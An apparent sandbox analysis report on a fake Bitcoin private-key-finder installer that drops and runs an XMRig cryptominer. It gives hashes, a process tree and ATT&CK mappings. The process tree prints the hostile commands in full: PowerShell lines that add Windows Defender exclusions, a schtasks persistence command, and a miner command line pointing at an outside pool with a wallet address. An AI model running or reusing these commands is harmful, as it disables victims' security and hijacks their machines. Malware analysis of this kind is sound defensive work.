xmrig | 61b6db96b367919bb130955c1243b7ca6fef3a1d111ffd390a4a8f66146d3eca

Analysis

max time kernel
300s
max time network
293s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
01-02-2025 20:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BitcoinPrivateKeyFinder/BitcoinPrivateKeyFinder-installer.exe
Size

2.3MB
MD5

413a9080cdbb5e9dafc7a582bae52cfd
SHA1

0558bdf441317f8a73969cb432fb5466cf5fdd3f
SHA256

9896da019919c17a14328756877e84eb39accd4a5766381dfd4b2a750bd47924
SHA512

455e7fb9a7409f9057b4c163bdef0ddb7b4ac6efa1f8e7073e605d0ba0e472e6ade7e551832b96772450fc0b2c9f13320f609beb602e54fcd21253cad780336e
SSDEEP

49152:LHzVdJupvlgZ4qcNLquRd1DZFAkt8YHwMr6CtI89Q4wvj33Vo+N2oR/vrDNJS8q:PMvWmJNLquRDZWkt8YHwMr6CmZ4eT2W

Score

10^/10

xmrig execution miner

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/5032-71-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5032-73-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5032-77-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5032-80-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5032-79-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5032-78-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5032-76-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4516	powershell.exe
3228	powershell.exe
3004	powershell.exe
5040	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
112	services64.exe
4636	sihost64.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4852 set thread context of 5032	4852	conhost.exe	95

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4200	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2684	conhost.exe
4516	powershell.exe
4516	powershell.exe
3228	powershell.exe
3228	powershell.exe
4852	conhost.exe
4852	conhost.exe
3004	powershell.exe
3004	powershell.exe
5040	powershell.exe
5040	powershell.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe
5032	explorer.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2684	conhost.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	4852	conhost.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeLockMemoryPrivilege	5032	explorer.exe
Token: SeLockMemoryPrivilege	5032	explorer.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 2916 wrote to memory of 2684	2916	BitcoinPrivateKeyFinder-installer.exe	77
PID 2916 wrote to memory of 2684	2916	BitcoinPrivateKeyFinder-installer.exe	77
PID 2916 wrote to memory of 2684	2916	BitcoinPrivateKeyFinder-installer.exe	77
PID 2684 wrote to memory of 716	2684	conhost.exe	78
PID 2684 wrote to memory of 716	2684	conhost.exe	78
PID 716 wrote to memory of 4516	716	cmd.exe	81
PID 716 wrote to memory of 4516	716	cmd.exe	81
PID 2684 wrote to memory of 3736	2684	conhost.exe	82
PID 2684 wrote to memory of 3736	2684	conhost.exe	82
PID 3736 wrote to memory of 4200	3736	cmd.exe	84
PID 3736 wrote to memory of 4200	3736	cmd.exe	84
PID 716 wrote to memory of 3228	716	cmd.exe	85
PID 716 wrote to memory of 3228	716	cmd.exe	85
PID 2684 wrote to memory of 540	2684	conhost.exe	86
PID 2684 wrote to memory of 540	2684	conhost.exe	86
PID 540 wrote to memory of 112	540	cmd.exe	88
PID 540 wrote to memory of 112	540	cmd.exe	88
PID 112 wrote to memory of 4852	112	services64.exe	89
PID 112 wrote to memory of 4852	112	services64.exe	89
PID 112 wrote to memory of 4852	112	services64.exe	89
PID 4852 wrote to memory of 4992	4852	conhost.exe	90
PID 4852 wrote to memory of 4992	4852	conhost.exe	90
PID 4992 wrote to memory of 3004	4992	cmd.exe	92
PID 4992 wrote to memory of 3004	4992	cmd.exe	92
PID 4852 wrote to memory of 4636	4852	conhost.exe	93
PID 4852 wrote to memory of 4636	4852	conhost.exe	93
PID 4992 wrote to memory of 5040	4992	cmd.exe	94
PID 4992 wrote to memory of 5040	4992	cmd.exe	94
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4852 wrote to memory of 5032	4852	conhost.exe	95
PID 4636 wrote to memory of 948	4636	sihost64.exe	96
PID 4636 wrote to memory of 948	4636	sihost64.exe	96
PID 4636 wrote to memory of 948	4636	sihost64.exe	96

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\BitcoinPrivateKeyFinder\BitcoinPrivateKeyFinder-installer.exe
"C:\Users\Admin\AppData\Local\Temp\BitcoinPrivateKeyFinder\BitcoinPrivateKeyFinder-installer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2916
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\BitcoinPrivateKeyFinder\BitcoinPrivateKeyFinder-installer.exe"
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3228
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3736
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4200
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Windows\system32\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:540
  - - C:\Windows\system32\services64.exe
      C:\Windows\system32\services64.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:112
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        5⤵
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4852
      - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5040
      - C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4636
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        7⤵
        
        PID:948
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.2miners.com:2222 --user=46h9BcFN4axivcCRq2zg8tHeUUex5H1xSNXnepNcck49ZtqBJQFAVPb3MSEZPwknFuQjajyjW3ZyMARwJLhd3yUZGyJvzAV --pass=x --cpu-max-threads-hint=20 --cinit-kill-targets="hg+0iL0ADzH1o9Q9JWB/ZQzl4J+pdRvm7P9HgwPrlLXLZ9RRIDmwc/MaGmjQYqBEpBY+BDxgUKf+GnaSBspGNkzH032ZU1K8Nr4DYtY/mW0=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-kill
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Filesize
539B

MD5
2d0c598bdafdf3bca91ec28b81c4474b

SHA1
2e7c2a21ceb95b3a774461e15f1f0a9ede36a3d5

SHA256
74f5fd99f66fcffa14a0927a9767c956120e90e714abea702b51a919c60d3ab0

SHA512
53fc7d64040f563601f7b5e63b1c1bbc7a98a4b1591bb18456bd3edb774c47859b0b56325ffc93128cdac547419ab11cfa1685f301b20ecb283f7414d4aed8a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
aa4f31835d07347297d35862c9045f4a

SHA1
83e728008935d30f98e5480fba4fbccf10cefb05

SHA256
99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

SHA512
ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
051a74485331f9d9f5014e58ec71566c

SHA1
4ed0256a84f2e95609a0b4d5c249bca624db8fe4

SHA256
3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888

SHA512
1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e07eea85a8893f23fb814cf4b3ed974c

SHA1
8a8125b2890bbddbfc3531d0ee4393dbbf5936fe

SHA256
83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea

SHA512
9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fqjjk0z5.faz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe

Filesize
32KB

MD5
4c13defbd1f7aaf73132475a0a9f0c87

SHA1
f63392c0839740f437f86b647cb4f45aa8984fd4

SHA256
e86b63513e07ed31fe2316196e347ce436695003d7b46e4654289aa6f3efd773

SHA512
083b0757b19df11aa7748aadda25f22391bb5d980e4534c5084af2016f8486365cc596a86e26a64a7d245533fef7ffc82a087ec071983cd79f6f0edd6901cd42

Download Submit
C:\Windows\system32\services64.exe

Filesize
2.3MB

MD5
413a9080cdbb5e9dafc7a582bae52cfd

SHA1
0558bdf441317f8a73969cb432fb5466cf5fdd3f

SHA256
9896da019919c17a14328756877e84eb39accd4a5766381dfd4b2a750bd47924

SHA512
455e7fb9a7409f9057b4c163bdef0ddb7b4ac6efa1f8e7073e605d0ba0e472e6ade7e551832b96772450fc0b2c9f13320f609beb602e54fcd21253cad780336e

Download Submit
memory/948-81-0x0000028530330000-0x0000028530337000-memory.dmp

Filesize
28KB

Download
memory/948-82-0x0000028531EC0000-0x0000028531EC6000-memory.dmp

Filesize
24KB

Download
memory/2684-4-0x00007FFF4BCD0000-0x00007FFF4C792000-memory.dmp

Filesize
10.8MB

Download
memory/2684-0-0x00000122EA880000-0x00000122EAAA1000-memory.dmp

Filesize
2.1MB

Download
memory/2684-6-0x00007FFF4BCD0000-0x00007FFF4C792000-memory.dmp

Filesize
10.8MB

Download
memory/2684-5-0x00007FFF4BCD0000-0x00007FFF4C792000-memory.dmp

Filesize
10.8MB

Download
memory/2684-3-0x00000122EC860000-0x00000122EC872000-memory.dmp

Filesize
72KB

Download
memory/2684-33-0x00007FFF4BCD0000-0x00007FFF4C792000-memory.dmp

Filesize
10.8MB

Download
memory/2684-2-0x00000122ED4D0000-0x00000122ED6F2000-memory.dmp

Filesize
2.1MB

Download
memory/2684-40-0x00007FFF4BCD0000-0x00007FFF4C792000-memory.dmp

Filesize
10.8MB

Download
memory/2684-1-0x00007FFF4BCD3000-0x00007FFF4BCD5000-memory.dmp

Filesize
8KB

Download
memory/4516-8-0x00007FFF4BCD0000-0x00007FFF4C792000-memory.dmp

Filesize
10.8MB

Download
memory/4516-21-0x00007FFF4BCD0000-0x00007FFF4C792000-memory.dmp

Filesize
10.8MB

Download
memory/4516-18-0x00007FFF4BCD0000-0x00007FFF4C792000-memory.dmp

Filesize
10.8MB

Download
memory/4516-17-0x0000024EDCBD0000-0x0000024EDCBF2000-memory.dmp

Filesize
136KB

Download
memory/4516-7-0x00007FFF4BCD0000-0x00007FFF4C792000-memory.dmp

Filesize
10.8MB

Download
memory/5032-71-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5032-73-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5032-74-0x0000000000FE0000-0x0000000001000000-memory.dmp

Filesize
128KB

Download
memory/5032-77-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5032-80-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5032-79-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5032-78-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5032-76-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download